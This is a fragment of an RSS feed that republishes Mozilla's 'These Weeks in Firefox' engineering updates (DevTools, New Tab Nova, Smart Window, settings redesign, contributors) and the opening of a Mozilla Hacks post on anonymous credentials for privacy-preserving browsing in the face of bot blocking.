<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> improved @container tooltip so it show the value of variables used in style()(<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030239">#2030239</a>), has enough contrast in dark mode (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033782">#2033782</a>) and contains a link to select the container (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031688">#2031688</a>)
<ul>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image3.png"><img alt='Firefox Developer Tools showing a CSS @container style() rule in the Rules panel. A popover for a element displays container properties including "container-name: hello section-container", "container-type: inline-size", and the custom property "--w: 100px", while indicating that --secondary and --plouf are not set. Below, the container query uses nested var() fallbacks, and a CSS declaration previews the resolved value for background-color.' class="aligncenter size-full wp-image-2071" height="532" src="https://blog.nightly.mozilla.org/files/2026/06/image3.png" width="1038"></a></li>
</ul>
</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=656417">Hubert Boma Manilla (:bomsy)</a> is making good progress on migrating the Console to CodeMirror 6 (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032758">#2032758</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026569">#2026569</a>)</li>
</ul>
<h4>Fluent</h4>
<ul>
<li>We’re now at over 72% of our strings being Fluent! Got a component still using .properties? Convert when you can!</li>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image5.png"><img alt="Stacked area chart titled “Are We Fluent Yet?” showing the number and type of localization strings available in Firefox from 2018 to 2026. The chart tracks Fluent strings (green), Properties strings (blue), DTD strings (pink), and a small number of INI strings. Over time, Fluent strings steadily increase while DTD and Properties strings decline. A tooltip at April 26, 2026 shows 10,372 Fluent strings, 3,997 Properties strings, and no remaining DTD or INC strings, illustrating Firefox’s ongoing migration to the Fluent localization system." class="aligncenter size-full wp-image-2073" height="924" src="https://blog.nightly.mozilla.org/files/2026/06/image5.png" width="1509"></a></li>
</ul>
<h4>Migration Improvements</h4>
<ul>
<li>Thanks to dao for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035009">fixing a recent alignment issue in the migration wizard dropdown</a></li>
<li>Thanks to volunteer contributor Anthony Mclamb for his patch that <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027915">disables the legacy EdgeHTML Edge migrator</a>! Once that finishes rolling out, presuming no surprises, we’ll go ahead and remove the migrator entirely.</li>
</ul>
<h4>New Tab Page</h4>
<ul>
<li>Nova for New Tab has ridden the trains to Beta! It will be enabled by default, globally, when Firefox 151 goes out to release on May 19th
<ul>
<li>It’s possible that we’ll do a train-hop coupled with an experiment to enable HNT Nova for a few clients a bit earlier.</li>
</ul>
</li>
<li>Maxx Crawford<a href="https://bugzil.la/2032213"> enabled Nova designs for New Tab</a>, rolling out the updated layout, widgets, and customization panel behind HNT Nova flags.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2033165"> fixed the Nova content feed to render the intended four‑column layout</a> by correcting CSS grid breakpoints.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2033264"> resolved a first‑load failure in the Weather widget</a> by fixing init order and fetch timing, eliminating the “Oops” error.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2031707"> synchronized the Weather toggle between about:preferences#home and the panel</a> via the shared showWeather pref to prevent desync.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2021460"> updated Nova grid focus order</a> to align tab flow with visual order for keyboard users.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2034620"> fixed critical UI issues in Lists and Timer widgets</a> covering overflow, controls, and layout stability.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2032462"> guarded document.dir access in Nova render paths</a> to avoid startup cache worker errors and improve startup stability.</li>
<li>Rolf<a href="https://bugzil.la/2031568"> added a new normalization method for the inferred interest vector</a> to stabilize topic relevance across sessions.</li>
<li>Rolf<a href="https://bugzil.la/2031569"> prevented unnecessary content refreshes during Pocket New Tab experiments</a>, reducing jank and bandwidth.</li>
<li>Sameeksha<a href="https://bugzil.la/2008197"> defined the Customize button’s expanded/collapsed state programmatically</a> using aria-expanded for better a11y.</li>
<li>liz<a href="https://bugzil.la/2008119"> clarified follow/unfollow/blocked button names with topic context</a> so screen readers announce clear actions.</li>
<li>Vector<a href="https://bugzil.la/2008128"> marked the Delete from History control as opening a dialog</a> via aria-haspopup=dialog for assistive tech.</li>
<li>Scott Downe<a href="https://bugzil.la/2034145"> fixed a regression that flipped the Wallpapers pref off</a>, restoring user selections.</li>
<li>Irene Ni<a href="https://bugzil.la/2033927"> corrected privacy link color and focus styles</a> for contrast and keyboard visibility.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2030873"> added a wallpaper toggle reset in the Nova customization panel</a> so users can quickly restore default wallpapers without extra steps.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2031669"> fixed the Customize pencil button to match the Nova spec</a>, aligning placement and iconography for visual consistency.</li>
<li>Dre<a href="https://bugzil.la/2032607"> updated the ‘Fresh new’ wallpapers copy</a> to a clearer, localized message for better comprehension.</li>
<li>Irene Ni<a href="https://bugzil.la/2033927"> fixed Nova privacy link color and focus styles</a> to meet contrast and focus ring guidelines, improving accessibility on New Tab.</li>
<li>Irene Ni<a href="https://bugzil.la/2034098"> adjusted Sponsored tile character limits</a> to prevent truncation/overflow, yielding cleaner titles across grid and wide tiles.</li>
<li>Scott Downe<a href="https://bugzil.la/2034145"> fixed a regression that flipped the Wallpapers user pref to false</a>, restoring wallpapers for affected users and preventing unintended disablement.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2034688"> hooked the wallpaper check into the new toggle logic</a> so the Customization Panel accurately reflects wallpaper availability and state.</li>
<li>Irene Ni<a href="https://bugzil.la/2034912"> landed Nova UI updates for the Daily Briefing 3-pack card</a>, improving spacing, type scale, and tap targets.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2030873"> added a wallpaper toggle reset in the Nova customization panel</a> so users can quickly restore default wallpapers without extra steps.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2031669"> fixed the Customize pencil button to match the Nova spec</a>, aligning placement and iconography for visual consistency.</li>
<li>Dre<a href="https://bugzil.la/2032607"> updated the ‘Fresh new’ wallpapers copy</a> to a clearer, localized message for better comprehension.</li>
<li>Irene Ni<a href="https://bugzil.la/2033927"> fixed Nova privacy link color and focus styles</a> to meet contrast and focus ring guidelines, improving accessibility on New Tab.</li>
<li>Irene Ni<a href="https://bugzil.la/2034098"> adjusted Sponsored tile character limits</a> to prevent truncation/overflow, yielding cleaner titles across grid and wide tiles.</li>
<li>Scott Downe<a href="https://bugzil.la/2034145"> fixed a regression that flipped the Wallpapers user pref to false</a>, restoring wallpapers for affected users and preventing unintended disablement.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2034688"> hooked the wallpaper check into the new toggle logic</a> so the Customization Panel accurately reflects wallpaper availability and state.</li>
<li>Irene Ni<a href="https://bugzil.la/2034912"> landed Nova UI updates for the Daily Briefing 3-pack card</a>, improving spacing, type scale, and tap targets.</li>
</ul>
<h4>Search and Urlbar</h4>
<ul>
<li>Marco has fixed a<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034743"> couple</a> of<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1989632"> issues</a> with the places databases to try and improve stability. This should help with avoiding users losing bookmarks or favicons.</li>
<li>Work continues on the new separate search bar to improve the functionality, e.g.<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033231"> allowing middle click</a> to perform a search in a new tab,<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032991"> avoiding performing a</a> search when adding a search engine.</li>
<li>Work also continues on the new Nova layouts.</li>
</ul>
<h4>Smart Window</h4>
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032122">uplifted 10 bugs</a> to 150.0.1 dot release addressing initial user feedback from diary study and <a href="https://connect.mozilla.org/">Connect</a>
<ul>
<li>jump to bottom of conversation <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028692">2028692</a></li>
<li>stop streaming button <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029204">2029204</a></li>
<li>back/forward navigation from assistant <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029229">2029229</a></li>
<li>dark mode for various chips <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2024499">2024499</a></li>
</ul>
</li>
<li>search engine switching from smart bar <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021973">2021973</a></li>
<li>Nova styling within smart window <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026794">2026794</a></li>
</ul>
<h4>Storybook/Reusable Components/Acorn Design System</h4>
<ul>
<li>Dustin converted moz-breadcrumb-group variables into JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029181">Bug 2029181 – Convert moz-breadcrumb-group variables into JSON design tokens</a></li>
<li>Dustin converted moz-box-* variables into JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029180">Bug 2029180 – Convert moz-box-* variables into JSON design tokens</a></li>
<li>Dustin converted moz-promo variables to JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029190">Bug 2029190 – Convert moz-promo variables into JSON design tokens</a></li>
<li>Dustin converted moz-reorderable-list variables to JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029191">Bug 2029191 – Convert moz-reorderable-list variables into JSON design tokens</a></li>
<li>Dustin converted moz-visual-picker variables to JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029193">Bug 2029193 – Convert moz-visual-picker-item variables into JSON design tokens</a></li>
<li>Dustin updated browser-shared.css so it passes use-design-tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022985">Bug 2022985 – Update browser-shared.css so it passes use-design-tokens</a></li>
<li>Dustin updated popup.css so it passes use-design-tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022979">Bug 2022979 – Update popup.css so it passes use-design-tokens</a></li>
<li>Jon added opacity tokens and added opacity to use-design-tokens stylelint rule  <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1955325">Bug 1955325 – Create opacity tokens</a></li>
<li>Jon converted toolbar design tokens to JSON <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2017970">Bug 2017970 – Convert toolbar design tokens to json</a></li>
<li>Anna fixed moz-select with panel-list drop-down size inconsistency <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032365">Bug 2032365 – Applications Action drop-down menus sometimes have a different size when opened</a></li>
<li>Anna fixed issue with the disabled state of moz-radio component <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027123">Bug 2027123 – moz-radio disabled state cannot be changed while the moz-radio-group is disabled</a></li>
<li>Anna updated moz-button and moz-box-button components to prevent label corruption when accesskeys are present and the label changes.   <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022326">Bug 2022326 – moz-button with accesskey label becomes corrupted when l10nId updates dynamically</a></li>
</ul>
<h4>UX Fundamentals</h4>
<ul>
<li>The error pages shown when a server sends back an invalid response header or an unsupported content encoding now display accurate, context-specific messages. The invalid response header page also gained a helpful list of next steps. – <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027209">2027209</a></li>
<li>In progress: The error page illustrations are being replaced with new artwork, and the system now supports per-illustration size configuration, giving each image the ability to define its own appropriate dimensions. – <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031837">2031837</a></li>
</ul>
<h4>Settings Redesign</h4>
<ul>
<li>Tim converted settings related to Accessibility page to config-based pane <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1968116">Bug 1968116 – Convert settings related to Accessibility page to config-based settings</a></li>
<li>Benjamin converted Privacy &amp; Security page to the config-based pane <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1968112">Bug 1968112 – Convert settings related to Privacy &amp; Security page to config-based settings</a></li>
<li>Finn integrated Firefox Labs page into setting-pane config <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021047">Bug 2021047 – Integrate Firefox Labs page into setting-pane config</a></li>
<li>Anna converted Firefox Updates section to config-based prefs <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1990961">Bug 1990961 – Convert Firefox Updates section to config-based prefs</a></li>
<li>Mark Kennedy added moz-promo, that is welcoming users to the redesigned settings <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015093">Bug 2015093 – Add a moz-promo to welcome users to the redesign</a>
<ul>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image4.png"><img alt="The Firefox settings page in dark mode showing a notification banner that reads, “Same settings, new look!” The message further explains that the page has been reorganized to make settings easier to scan and explore, while keeping all existing settings unchanged. A “Got it” button appears below the message. The “AI Controls” section is visible underneath the banner." class="aligncenter size-full wp-image-2072" height="559" src="https://blog.nightly.mozilla.org/files/2026/06/image4.png" width="1431"></a></li>
</ul>
</li>
<li>Anna added possibility to search for actions in the redesigned “Applications” section <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020370">Bug 2020370 – It’s no longer possible to search for actions in the new “Applications” section</a></li>
<li>Anna fixed the Settings navbar layout breakage</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Nightly: More Kit, More Control – These Weeks in Firefox: Issue 203]]></title>
<description><![CDATA[Highlights

James enabled adaptive autofill in Nightly for testing, which we believe should provide better results in the URL bar when doing autocomplete!
Jack updated the illustrations shown on some of our error pages to match the latest approved designs, giving users more polished artwork when ...]]></description>
<link>https://tsecurity.de/de/3693294/tools/firefox-nightly-more-kit-more-control-these-weeks-in-firefox-issue-203/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693294/tools/firefox-nightly-more-kit-more-control-these-weeks-in-firefox-issue-203/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:32 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>James <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032547">enabled adaptive autofill in Nightly</a> for testing, which we believe should provide better results in the URL bar when doing autocomplete!</li>
<li>Jack <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031837">updated the illustrations shown on some of our error pages</a> to match the latest approved designs, giving users more polished artwork when the browser encounters connection or security errors!</li>
</ul>
<p><img alt="Internet connection error page with an adorable Kit illustration" class="aligncenter wp-image-2080 size-full" height="652" src="https://blog.nightly.mozilla.org/files/2026/06/image2-1.png" width="1584"></p>
<ul>
<li>Controls for the Memories feature <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032998">can now be set during Smart Window onboarding</a></li>
</ul>
<p><img alt='Two radio button controls for the Smart Window Memories feature, including "Chats in Smart Window" and "Browsing across Firefox"' class="aligncenter wp-image-2078 size-full" height="546" src="https://blog.nightly.mozilla.org/files/2026/06/image4-1-e1780509799577.png" width="500"></p>
<p> </p>
<ul>
<li>We’ve disabled the CSS filter implicitly applied to WebExtension pageAction SVG icons across all release channels starting in Firefox 152, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016509">completing the deprecation</a>
<ul>
<li><b>NOTE:</b> The blog post published at<a href="https://blog.mozilla.org/addons/2026/04/23/webextensions-api-changes-firefox-149-152/"> WebExtensions API changes in Firefox 149-152</a> provides to extensions developers more details about this deprecation and links to the related MDN docs.</li>
</ul>
</li>
</ul>
<h3>Friends of the Firefox team</h3>
<h4><a href="https://bugzilla.mozilla.org/buglist.cgi?title=Resolved%20bugs%20(excluding%20employees)&amp;quicksearch=2031599%2C2033820%2C2034178%2C1930213%2C2035355%2C1611643%2C2020302%2C2026007%2C2031015%2C2035252%2C2036528%2C411384%2C2033780%2C2036199%2C1812100%2C1898257%2C2030070%2C2030072">Resolved bugs (excluding employees)</a></h4>
<p><a href="https://github.com/niklasbaumgardner/NewContributorScraper">Script to find new contributors from bug list</a></p>
<h4>Volunteers that fixed more than one bug</h4>
<ul>
<li>Amin Amir</li>
<li>Pranjali Srivastava</li>
<li>Sam Johnson</li>
</ul>
<h4>New contributors (🌟 = first patch)</h4>
<ul>
<li> 🌟:23rd: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1812100">Regression: The new swipe-to-navigation indicator stucks for a moment, when deciding not to navigate the other page</a></li>
<li>🌟Akeem Omosanya: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035252">Remove commented-out code in SearchService.sys.mjs</a></li>
<li>Amin Amir:
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">Fix browsingContext.sys.mjs to assign to #contextCreatedHandled instead of contextCreatedHandled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033820">Fix missing WITHOUT ROWID SQLite performance optimization in SERPCategorization.sys.mjs</a></li>
</ul>
</li>
<li>🌟Sahaj: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031015">Suggest the default target language for translation after changing the detected source language</a></li>
<li>🌟JIANG Zhirui: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036199">Breakpad build failed on Windows using VS2026 due to removal of stdext</a></li>
<li> John Iweh: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030072">Add “Open in New Tab” and “Open in New Container Tab” options to the context menu for Tabs from Other Devices</a></li>
<li>Jak: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030070">Bookmarks and History – should respect the “When you open a link, image or media in a new tab, switch to it immediately” setting</a></li>
<li>🌟Andy [:rgbcmy]: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1611643">Autoplayed next video should also be PIP</a></li>
<li> konyhéa: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1930213">“Escape” key should collapse the expanded on hover sidebar launcher even if hover is still active.</a></li>
<li> Pranjali Srivastava:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1898257">Remove icon property from sidebar extensions</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026007">Show language-agnostic SelectTranslations context menu item when the source and target languages are the same</a></li>
</ul>
</li>
</ul>
<h3>Project Updates</h3>
<h4>Add-ons / Web Extensions</h4>
<h5>Addon Manager &amp; about:addons</h5>
<ul>
<li>Fixed long-standing regression on the autocomplete and datalist popups for extension inline options pages on about:addons (introduced in Firefox 68 by<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1532724"> Bug 1532724</a>, fix shipping in Firefox 152) –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1595158"> Bug 1595158</a></li>
</ul>
<h5>WebExtensions Framework</h5>
<ul>
<li>Fixed access to web-accessible resources declared with &lt;all_urls&gt; from sandboxed documents (null-principal URLs), restoring extension redirects from the context-menu search flow, starting in Firefox 152 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033905"> Bug 2033905</a></li>
</ul>
<h5>WebExtension APIs</h5>
<ul>
<li>Added exhaustive test coverage for tabs.move() against additional edge cases related to split-view tabs –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029092"> Bug 2029092</a></li>
</ul>
<h4>DevTools</h4>
<ul>
<li>Andreas Farre improved the Session History tab in the Application panel (still behind devtools.application.sessionHistory.enabled)
<ul>
<li>added support for remote debugging (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2014064">#2014064</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016121">#2016121</a>)</li>
<li>made sure that calls to History.replaceState are reflected in the UI (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037359">#2037359</a>)</li>
</ul>
</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> fixed the most frequent DevTools crash we were observing in Telemetry, adding a guard against IDBTransaction errors when retrieving breakpoints in the Debugger (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030260">#2030260</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> fixed the image preview tooltip for relative URLs images in constructed stylesheet (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035503">#2035503</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> reduced the overhead we had because of network requests monitoring by only decoding response content when the user actually want to see the response (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026228">#2026228</a>)</li>
</ul>
<h4>WebDriver</h4>
<ul>
<li>Amin Amir cleaned up an <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">incorrect variable assignment</a> in our browsingContext module.</li>
<li>Logan Rosen <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036603">updated stale references and broken links</a> in our documentation about Marionette.</li>
<li>Sameem improved the Marionette and WebDriver BiDi <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020302">screenshot commands to enforce maximum allowed dimensions</a>.</li>
<li>Leo McArdle fixed <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030964">the regression in the “log.entryAdded” event, which lacked an error message in the “text” field for the messages of type “error”</a>.</li>
<li>Henrik Skupin fixed an issue in Marionette where <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033769">WebDriver:Navigate and WebDriver:Refresh did not handle errors</a> when the underlying navigation failed.</li>
<li>Henrik Skupin <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1839953">improved geckodriver to detect an early Firefox exit during startup on Android</a>, avoiding up to 60 seconds of unnecessary connection attempts.</li>
<li>Henrik Skupin updated the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028933">geckodriver CI build job to produce a universal macOS binary</a> supporting both x64 and aarch64.</li>
</ul>
<h4>Lint, Docs and Workflow</h4>
<ul>
<li>Sylvestre <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2023411">ported some linters</a> (e.g. file-whitespace, test-manifest-toml, license, file-perm, rejected-words &amp; more) to Rust to help improve the runtime of the code review bot.</li>
<li>Dale has been working on migration to moz-src for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034040">customkeys</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035086">dom/quota</a> and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035295">odom/geolocation</a>
<ul>
<li><a href="https://arewemozsrcyet.com/">https://arewemozsrcyet.com/</a></li>
</ul>
</li>
</ul>
<h4>New Tab Page</h4>
<ul>
<li>We did our first region-specific trainhop on May 11th (just 15% of the US), and turned on HNT Nova (and sometimes Widgets) for those clients to get some advance-data of its behaviour in the wild! A note that HNT Nova gets turned on for everybody when Firefox 151 ships on May 19th.
<ul>
<li>We’ll be launching a similar experiment in the DE, probably on May 12th, also at 15% population.</li>
</ul>
</li>
<li>Most of the team is heads down building out a sports-tracking widget, attempting to get that ready in time to be generally available for the upcoming World Cup event.</li>
<li>Dre landed a new world clock widget, which is currently off by default, but pretty snazzy!</li>
</ul>
<p><img alt="World clock widget in New Tab featuring different time zones for YTO, BER, SYD, and LAX." class="aligncenter wp-image-2079 size-full" height="162" src="https://blog.nightly.mozilla.org/files/2026/06/image3-1.png" width="346"></p>
<h4>Search and Urlbar</h4>
<ul>
<li>Nova (URL Bar Design Refresh)
<ul>
<li>Drew and Daisuke continued their work on <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015612">Nova styling for the Address bar</a> (input and view).</li>
</ul>
</li>
<li>Search and Suggest
<ul>
<li>Drew finalized two bugs for World Cup and sports suggestions, which were landed and uplifted: one to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035322">update the localization string for scheduled games</a> and another to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034350">show both teams’ icons in suggestions</a>. Drew also landed and uplifted a fix for <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035353">rich search suggestion icons being forced into a square aspect ratio</a>.</li>
<li>Standard8 updated Ecosia favicons to the latest branding, including QA testing and publishing.</li>
</ul>
</li>
<li>Settings Redesign (SRD)
<ul>
<li>Stephanie landed a test to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021512">ensure search suggestion settings are hidden when quicksuggest is disabled</a>, as well as a patch to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031341">resolve TypeScript issues</a> in search.mjs, and is adding test coverage to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2007397">confirm removed search engines are not displayed in the default engines dropdown</a>.</li>
</ul>
</li>
<li>General URL Bar and Component Updates
<ul>
<li>Daisuke landed implementation of the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1893083">context menu on URL bar results</a>, and a fix to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020177">show the loading URL in the URL bar when starting up with a homepage</a>.
<ul>
<li>Marco is working on several tasks, including a <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1756564">PDF download / focus stealing issue</a> and <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1924124">allowing arrays to be bound in Sqlite.sys.mjs</a>. Marco also worked on fixes related to Places, such as <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034743">avoiding replacing the favicons database if it is not corrupt</a>.</li>
</ul>
</li>
<li>Standard8 finalized the <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028423">URL bar test manifest split</a>. Standard8 also <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016401">upgraded us to TypeScript 6</a>.</li>
<li>Moritz landed a fix for URL bar abandonment telemetry being recorded when clicking an engine in the unified search button popup (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032973">Bug 2032973</a>), which was also uplifted. Moritz also <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034507">simplified search mode switcher item activation in tests</a>, and made it so that <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036030">the unified search button popup closes when installing an open search engine</a>.</li>
</ul>
</li>
</ul>
<h4>Smart Window</h4>
<ul>
<li>natural language starting with tab close/undo <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035343">2035343</a> with expandable action log <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031508">2031508</a></li>
</ul>
<p><img alt="Tab close and undo actions in Smart Window accompanied by an expandable log of actions taken" class="aligncenter wp-image-2077 size-full" height="256" src="https://blog.nightly.mozilla.org/files/2026/06/image1-1.png" width="220"></p>
<ul>
<li>assistant rendering feedback up/down <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032994">2032994</a> and markdown table <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027029">2027029</a></li>
<li>nova styling blur <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027877">2027877</a> and suggestions <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026823">2026823</a></li>
<li>accessibility screen reader <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028676">2028676</a> and keyboard focus <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037565">2037565</a></li>
<li>optimize conversation starters extra requests <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030005">2030005</a> and caching <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033430">2033430</a></li>
</ul>
<h4>Storybook/Reusable Components/Acorn Design System</h4>
<ul>
<li>Nova token updates occasionally, focused on SRD</li>
</ul>
<h4>UX Fundamentals</h4>
<ul>
<li>Added support for the “SEC_ERROR_CA_CERT_INVALID” certificate error to the Felt Privacy error pages. – <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035942">2035942</a></li>
</ul>
<h4>Settings Redesign</h4>
<ul>
<li>Settings redesign is being tested and will hopefully go out in Firefox 152!</li>
</ul>
<ul>
<li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacks.Mozilla.Org: PACT: Anonymous Credentials for the Web]]></title>
<description><![CDATA[This is the technical companion to our update on Distilled, “Keeping the web open and private in the bot era.” Here we take a deeper look at the problem space, the design we’re proposing, and the problems still left to solve. 
Bots (and privacy-preserving browsers) not welcome 
Browse a news site...]]></description>
<link>https://tsecurity.de/de/3693291/tools/hacksmozillaorg-pact-anonymous-credentials-for-the-web/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693291/tools/hacksmozillaorg-pact-anonymous-credentials-for-the-web/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="c43"><em><span class="c11 c1">This is the technical companion to our update on Distilled, </span><span class="c11 c1 c17"><a class="c5" href="https://blog.mozilla.org/en/privacy-security/keeping-the-web-open-and-private-in-the-bot-era/">“Keeping the web open and private in the bot era.”</a></span><span class="c11 c1"> Here we take a deeper look at the problem space, the design we’re proposing, and the problems still left to </span><span class="c1 c11">solve</span></em><span class="c13 c11 c1"><em>.</em> </span></p>
<h3 class="c24"><span class="c2 c1">Bots (and privacy-preserving browsers) not welcome </span></h3>
<p class="c40"><span class="c0">Browse a news site in a private window. Shop at a major retailer with a VPN. Visit a video streaming platform with anti-fingerprinting defenses tuned up. You’ll see the same responses: registration walls, block pages, and endless CAPTCHAs. The message is clear: </span><span class="c13 c11 c1">if we think you might be a bot, you’re not welcome</span><span class="c0">. </span></p>
<p class="c53"><span class="c0">Websites have valid reasons for wanting to block bots. Bots enable volumetric abuse</span><span class="c1">, abuse that wouldn’t otherwise be feasible if they had to be carried out by humans</span><span class="c0">. </span><span class="c0"> For example</span><span class="c1">: SEO comment spam, credential stuffing and DDoSing</span><span class="c0">.</span><span class="c0"> Consequently many sites employ dedicated anti-abuse tooling which aims to keep the bots out whilst minimizing friction for human visitors. </span></p>
